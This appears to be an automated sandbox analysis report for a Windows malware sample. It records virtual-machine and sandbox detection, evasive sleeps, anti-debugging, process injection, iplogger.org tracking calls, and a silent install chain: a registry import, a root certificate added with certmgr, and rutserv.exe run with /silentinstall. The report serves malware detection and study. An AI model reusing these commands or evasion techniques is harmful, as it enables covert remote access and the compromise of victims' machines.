Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\regedit.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\ProgramData\Immunity\rutserv.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 1wOdXavtlE.exe PID: 6844, type: MEMORY

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\ProgramData\Immunity\rutserv.exe

System information queried: FirmwareTableInformation

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, ssevs.exe, 00000016.00000002.492325113.000000000367A000.00000004.00000001.sdmp, sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: 1wOdXavtlE.exe, 00000000.00000002.350278531.0000000002CCA000.00000004.00000001.sdmp, ssevs.exe, 00000016.00000002.492325113.000000000367A000.00000004.00000001.sdmp, sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Window / User API: threadDelayed 1968	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Window / User API: threadDelayed 6807	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Window / User API: threadDelayed 761

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-97L06.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Dropped PE file which has not been started: C:\ProgramData\is-PFD3D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\ProgramData\Immunity\is-1J28N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\ProgramData\Immunity\is-2SOD7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BVEFJ.tmp\pass.tmp	Dropped PE file which has not been started: C:\ProgramData\Immunity\is-02I40.tmp	Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6848	Thread sleep time: -31500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe TID: 6436	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 660	Thread sleep time: -270000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\conhost.exe TID: 2268	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 6440	Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 5628	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe TID: 3500	Thread sleep count: 173 > 30
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe TID: 5236	Thread sleep time: -31500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe TID: 5308	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe TID: 956	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 6768	Thread sleep count: 71 > 30
Source: C:\Windows\System32\svchost.exe TID: 6272	Thread sleep time: -30000s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040B268 FindFirstFileW,FindClose,	17_2_0040B268
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0040AC9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	17_2_0040AC9C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_005E9B24 FindFirstFileW,GetLastError,	19_2_005E9B24
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040CBFC FindFirstFileW,FindClose,	19_2_0040CBFC
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_0040C630 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	19_2_0040C630
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: 19_2_00641778 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	19_2_00641778

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_004A1628 GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

17_2_004A1628

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 31500	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 31500
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Thread delayed: delay time: 31500
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Thread delayed: delay time: 922337203685477

Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: svchost.exe, 0000000F.00000002.464247410.00000221A32A5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: sssevs.exe, 00000019.00000002.494107631.00000000035BE000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: 1wOdXavtlE.exe, 00000002.00000002.482862407.00000000010C3000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000001.00000002.336388011.0000025C3AC70000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.400774600.000001D39DE60000.00000002.00000001.sdmp, svchost.exe, 00000008.00000002.419604983.00000229106A0000.00000002.00000001.sdmp, svchost.exe, 0000000F.00000002.467674864.00000221A4200000.00000002.00000001.sdmp, servs.exe, 00000011.00000002.546809570.00000000022C0000.00000002.00000001.sdmp, servs.tmp, 00000013.00000002.534419633.00000000025E0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe

Code function: 23_2_00007FF7D9F52C98 GetCurrentThreadId,memset,IsDebuggerPresent,OutputDebugStringW,

23_2_00007FF7D9F52C98

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe

Code function: 23_2_00007FF7D9F53D48 GetCurrentProcessId,CreateMutexExW,CloseHandle,WaitForSingleObjectEx,ReleaseMutex,WaitForSingleObjectEx,GetLastError,CloseHandle,SetLastError,GetLastError,CloseHandle,SetLastError,GetLastError,ReleaseMutex,SetLastError,GetProcessHeap,HeapFree,ReleaseMutex,

23_2_00007FF7D9F53D48

Enables debug privileges

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process token adjusted: Debug
Source: C:\ProgramData\Immunity\rutserv.exe	Process token adjusted: Debug

Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_64882991 SetUnhandledExceptionFilter,	23_2_64882991
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_648815C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	23_2_648815C0
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_648891FC GetCurrentProcessId,SetUnhandledExceptionFilter,Sleep,	23_2_648891FC
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_00007FF7D9F54A60 SetUnhandledExceptionFilter,	23_2_00007FF7D9F54A60
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Code function: 23_2_00007FF7D9F54D88 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_00007FF7D9F54D88

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

DLL side loading technique detected

Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\regedit.exe	Section loaded: C:\Windows\System32\uxtheme.dll
Source: C:\Windows\System32\conhost.exe	Section loaded: C:\Windows\System32\uxtheme.dll

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Memory written: C:\Users\user\AppData\Local\Temp\ssevs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Memory written: C:\Users\user\AppData\Local\Temp\sssevs.exe base: 400000 value starts with: 4D5A

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_0062F168 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

19_2_0062F168

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\Desktop\1wOdXavtlE.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tncg7	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_005A502C InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

19_2_005A502C

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Code function: 19_2_005A41D0 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

19_2_005A41D0

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\servs.exe

Code function: 17_2_00405AC0 cpuid

17_2_00405AC0

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	17_2_0040B3B8
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetLocaleInfoW,	17_2_0041E154
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetLocaleInfoW,	17_2_0041E1A0
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_0040A840
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: GetLocaleInfoW,	17_2_004A0F2C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	19_2_0040CD4C
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	19_2_0040C1D4
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Code function: GetLocaleInfoW,	19_2_005ED8D0

Queries the installation date of Windows

Source: C:\ProgramData\Immunity\rutserv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the product ID of Windows

Source: C:\ProgramData\Immunity\rutserv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductId

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Users\user\Desktop\1wOdXavtlE.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
